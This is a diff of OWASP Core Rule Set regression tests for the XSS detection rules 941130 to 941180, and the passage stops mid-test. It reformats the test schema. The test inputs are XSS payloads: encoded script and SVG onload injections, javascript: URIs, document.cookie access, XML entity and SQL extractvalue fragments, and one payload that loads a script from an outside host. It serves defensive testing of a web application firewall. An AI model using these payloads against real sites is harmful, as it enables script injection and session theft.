test_title: 941130-6 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 6 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('%grorj;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-7 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('%grorj;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 7 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=afa" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-8 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=afa" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 8 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=chj" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-9 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=chj" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 9 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=/content.ini'||(select extractvalue(xmltype('%dwusu;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-10 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=/content.ini'||(select extractvalue(xmltype('%dwusu;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 10 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=EmptyValue'||(select extractvalue(xmltype('%awpsd;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-11 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=EmptyValue'||(select extractvalue(xmltype('%awpsd;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 11 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=file:/boot.ini'||(select extractvalue(xmltype('%cwtpc;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-12 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=file:/boot.ini'||(select extractvalue(xmltype('%cwtpc;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 12 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=Matched Data: %awfke;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-13 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=Matched Data: %awfke;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 13 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=oez" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-14 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=oez" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 14 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=(select extractvalue(xmltype('%anwyn;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-15 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=(select extractvalue(xmltype('%anwyn;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 15 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-16 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 16 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=2010-01-01'||(select extractvalue(xmltype('%fhklu;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-17 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=2010-01-01'||(select extractvalue(xmltype('%fhklu;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 17 desc: "FP test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post/api/v1/query?q=7XMLNS" - version: HTTP/1.0 - output: - no_log_contains: id "941130" - - test_title: 941130-18 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post/api/v1/query?q=7XMLNS" + version: HTTP/1.0 + output: + log: + no_expect_ids: [941130] + - test_id: 18 desc: "XSS test with encoded newline for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=chj" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-19 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=chj" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 19 desc: "Status Test Page - simple test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - headers: - Host: localhost - User-Agent: "foo!ENTITY % bar SYSTEM" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "941130" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + headers: + Host: localhost + User-Agent: "foo!ENTITY % bar SYSTEM" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml index 6f0599b13..bcebadd21 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml @@ -1,74 +1,72 @@ --- meta: author: "zmallen, azurit" - enabled: true - name: "941140.yaml" - description: "Tests to trigger, or not trigger 941130" +rule_id: 941140 tests: - - test_title: 941140-1 + - test_id: 1 desc: XSS vectors making use of javascript uri and tags, e.g.,

, in ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '9411400-1=%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E' - version: "HTTP/1.1" - output: - log_contains: id "941140" - - test_title: 941140-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '9411400-1=%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E' + version: "HTTP/1.1" + output: + log: + expect_ids: [941140] + - test_id: 2 desc: XSS vectors making use of javascript uri and tags, e.g.,

, in ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' - version: "HTTP/1.1" - output: - log_contains: id "941140" - - test_title: 941140-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' + version: "HTTP/1.1" + output: + log: + expect_ids: [941140] + - test_id: 3 desc: XSS vectors making use of javascript uri and tags, e.g.,

, in COOKIE stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941140" - - test_title: 941140-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941140] + - test_id: 4 desc: "Status Page Test - x=x:url(javascript as GET variable" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/bar?test=x%3Dx%3Aurl%28javascript" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941140" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/bar?test=x%3Dx%3Aurl%28javascript" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941140] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml index d68a05eea..847216a7e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml @@ -1,41 +1,39 @@ --- meta: author: "zmallen, azurit" - enabled: true - name: "941150.yaml" - description: "Tests to trigger, or not trigger 941150" +rule_id: 941150 tests: - - test_title: 941150-1 + - test_id: 1 desc: Disallowed HTML entities, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941150-1%3D%3Ca%20href%3D%22test%22' - version: "HTTP/1.1" - output: - log_contains: id "941150" - - test_title: 941150-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941150-1%3D%3Ca%20href%3D%22test%22' + version: "HTTP/1.1" + output: + log: + expect_ids: [941150] + - test_id: 2 desc: Disallowed HTML entities, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "payload=XSS" - version: "HTTP/1.1" - output: - log_contains: id "941150" + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "payload=XSS" + version: "HTTP/1.1" + output: + log: + expect_ids: [941150] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml index 3259fd6d9..5f5121ac2 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml @@ -1,267 +1,265 @@ --- meta: author: "csanders-git, Franziska Bühler, Walter Hop, Xhoenix, azurit" - enabled: true - name: "941160.yaml" - description: "Tests to trigger, or not trigger 941160" +rule_id: 941160 tests: - - test_title: 941160-1 + - test_id: 1 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941160" - - test_title: 941160-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941160] + - test_id: 2 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941160" - - test_title: 941160-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941160] + - test_id: 3 desc: "just another XSS teststring: " - version: HTTP/1.0 - output: - log_contains: id "941160" - - test_title: 941160-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='\">" + version: HTTP/1.0 + output: + log: + expect_ids: [941160] + - test_id: 15 desc: "SVG onload injection in filename" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php/%3Csvg/onload=alert()" - version: HTTP/1.0 - output: - log_contains: id "941160" - - test_title: 941160-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php/%3Csvg/onload=alert()" + version: HTTP/1.0 + output: + log: + expect_ids: [941160] + - test_id: 16 desc: "Detect XSS injection of 'dialog' tag ('" - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "payload=javascript:/*-->" + version: "HTTP/1.1" + output: + log: + expect_ids: [941170] + - test_id: 3 desc: 'Test first backslash match (javascript:(?:[\s\S]+[=\x5c\(\[\.<]) with: javascript: \\\\t (extra backslashes to work around rule transformations)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?var=javascript:%20%5C%5C%5C%5Ct" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?var=javascript:%20%5C%5C%5C%5Ct" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log: + expect_ids: [941170] + - test_id: 4 desc: 'Test second backslash match (javascript:(?:...|\x5c[ux]\d)) with: javascript:\\\\u0020 (extra backslashes to work around rule transformations)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?var=javascript:%5C%5C%5C%5Cu0020" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-5 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?var=javascript:%5C%5C%5C%5Cu0020" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log: + expect_ids: [941170] + - test_id: 5 desc: "Status Page Test - data: , as GET variable" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?test=%20data%3A%20%2C%20%3Cx%3E" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?test=%20data%3A%20%2C%20%3Cx%3E" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log: + expect_ids: [941170] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml index ba33b770f..a6a7c74f4 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml @@ -1,125 +1,123 @@ --- meta: author: "zmallen, azurit" - enabled: true - name: "941180.yaml" - description: "Tests to trigger, or not trigger 941180" +rule_id: 941180 tests: - - test_title: 941180-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941180-1=window.location' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941180-1=window.location' + version: "HTTP/1.1" + output: + log: + expect_ids: [941180] + - test_id: 2 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'document.cookie=941180-2' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'document.cookie=941180-2' + version: "HTTP/1.1" + output: + log: + expect_ids: [941180] + - test_id: 3 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: 'window.location=941180-3' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: 'window.location=941180-3' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941180] + - test_id: 4 desc: Negative test for Node-validator deny list keyword -->, present in stricter sibling 941181, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941180-4=-->' - version: "HTTP/1.1" - output: - no_log_contains: id "941180" - - test_title: 941180-5 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941180-4=-->' + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941180] + - test_id: 5 desc: "XSS with embedded shell execution attempt (batch script)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"-->'-->`-->" - version: HTTP/1.0 - output: - log_contains: id "941180" - - test_title: 941180-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"-->'-->`-->" + version: HTTP/1.0 + output: + log: + expect_ids: [941180] + - test_id: 6 desc: "Node-validator deny list keywords, ARGS, issue #2512" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'arg=...(document.domain)...' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-7 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'arg=...(document.domain)...' + version: 